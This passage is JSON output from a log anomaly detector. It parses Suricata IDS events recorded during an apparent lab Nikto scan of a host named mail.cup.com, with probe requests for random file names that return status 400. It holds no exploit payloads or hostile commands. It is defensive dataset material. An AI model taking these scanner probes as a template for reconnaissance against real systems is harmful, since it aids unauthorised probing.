"/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46894, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2181886319943873, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 
"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80", "/parser/model/time": 1583349514.294012, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46896, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], 
"AffectedLogAtomValues": [ "\\/bISn4adA.stm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.294206, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stm", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46896, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2017848634013862, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80", "/parser/model/time": 1583349514.296158, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46898, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.properties", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.296395, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46898, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2059741745021279, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80", "/parser/model/time": 1583349514.298422, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46900, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.298641, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
